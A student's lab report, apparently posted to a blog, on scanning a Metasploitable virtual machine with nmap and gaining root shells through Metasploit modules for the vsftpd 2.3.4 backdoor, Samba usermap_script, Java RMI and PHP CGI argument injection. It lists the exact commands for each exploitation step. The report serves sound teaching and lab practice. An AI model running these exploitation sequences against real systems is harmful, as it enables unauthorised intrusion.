20232404 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验目的

  • 掌握Nmap工具的漏洞扫描功能。
  • 识别常见服务的典型漏洞,理解漏洞原理。
  • 使用Metasploit框架利用核心漏洞,获取靶机权限,收集系统信息收集。

2.实验环境

  • 靶机:Metasploitable linux虚拟机,IP地址192.168.29.148。
  • 攻击机:Kali Linux虚拟机,IP地址192.168.29.134。
  • 靶机与攻击机处于同一局域网。

3.实验内容

3.1前期渗透

3.1.1主机发现

在https://www.rapid7.com/products/metasploit/metasploitable/ 安装靶机。使用ifconfig获取ip,可知靶机192.168.29.148。

image

打开msf,扫描靶机所在的网段:
search arp_sweep#找到auxiliary/scanner/discovery/arp_sweep模块。
use 0 #使用找到的此模块
set RHOSTS 192.168.29.0/24 #扫描靶机所在的网段
run

image

扫描结果表明靶机192.168.29.148活跃,设备标识为VMware, Inc.。

3.1.2端口扫描

在Kali Linux主机上对靶机进行端口扫描和版本探测,命令:nmap -sS -sV 192.168.29.148。其中-sS 半开放扫描,-sV 版本探测。

image

扫描结果表明了靶机192.168.29.148的开放端口、对应服务及具体版本,可推测其系统为Linux(Ubuntu)。

3.1.3漏洞扫描

使用命令nmap --script=vuln 192.168.29.148,扫描靶机开放端口的运行状态、对应服务的具体类型,并展示各服务存在的安全漏洞。

  • 21端口(FTP服务):vsFTPd 2.3.4版本存在后门漏洞(CVE-2011-2523),状态为可利用。扫描中通过模拟执行id命令,返回了uid=0(root) gid=0(root)的结果,证明该漏洞可成功获取靶机的root权限,后续实验中利用了此漏洞。

    image

  • 25端口的SMTP服务存在四种漏洞:(1)POODLE漏洞,因SSLv3协议缺陷导致通信明文易被中间人获取;(2)匿名DH密钥交换漏洞,易遭中间人主动攻击;(3)Logjam漏洞可降级TLS加密强度;(4)弱DH组强度漏洞易被被动监听。

    image

    image

  • 1099端口的Java RMI注册服务存在默认配置远程代码执行漏洞,因为允许从远程URL加载类,导致攻击者可执行任意代码。该漏洞已关联Metasploit的java_rmi_server利用模块,后续实验中会利用。
    image

  • 5432端口的PostgreSQL数据库服务存在三类SSL/TLS相关漏洞:(1)弱DH组强度易遭被动监听(2)CCS注入可能导致会话劫持或信息泄露(3)POODLE漏洞易被中间人获取通信明文。

    image

    image

  • 6667端口的扫描结果显示,靶机运行的是IRC服务;同时检测到该服务疑似为被植入后门的 UnrealIRCd版本,后门可能允许攻击者执行任意恶意操作。

  • 8180端口的扫描结果显示,靶机开放了未知服务;未检测到明确关联漏洞,但未知服务的功能与安全特性不明确。

    image

3.2Vsftpd源码包后门漏洞(21端口)

扫描靶机的21端口,命令nmap -sV -p 21 192.168.3.41。该端口开放,运行模块为vsftpd 2.3.4。所以选择漏洞exploit/unix/ftp/vsftpd_234_backdoor。

image

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.29.148
run
使用whoami可以看到当前用户为root,ls展示靶机的目录,攻击成功。

image

3.3SambaMS-RPC Shell命令注入漏洞(端口139)

在MSF中:
use exploit/multi/samba/usermap_script
set RHOST 192.168.29.148
exploit
使用whoami可以看到已经获取到root权限。

image

3.4Java RMI SERVER命令执行漏洞(1099端口)

查看1099端口是否打开,命令nmap -p 1099 192.168.29.148。1099端口是打开的。

image

在MSF中,选择漏洞exploit/multi/misc/java_rmi_server:
use exploit/multi/misc/java_rmi_server
show options
set RHOST 192.168.29.148
exploit
成功获取到shell,通过whoami确认获取到root权限。

image

image

3.5PHP CGI参数执行注入漏洞(80端口)

在MSF中,选择漏洞exploit/multi/http/php_cgi_arg_injection:
use exploit/multi/http/php_cgi_arg_injection
set RHOST ip
exploit

image

执行uname -a获取到了靶机的系统信息,为Ubuntu内核。还通过pwd确认当前路径为/var/www,说明该漏洞已成功利用并获取了靶机的命令执行权限。

4.学习感悟

本次实验较为轻松,使用的都是之前配置好的工具。而且感觉学习网络攻防后,对于虚拟机的理解加深了。

参考资料

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

posted @ 2025-11-17 20:21  20232404  阅读(0)  评论(0)    收藏  举报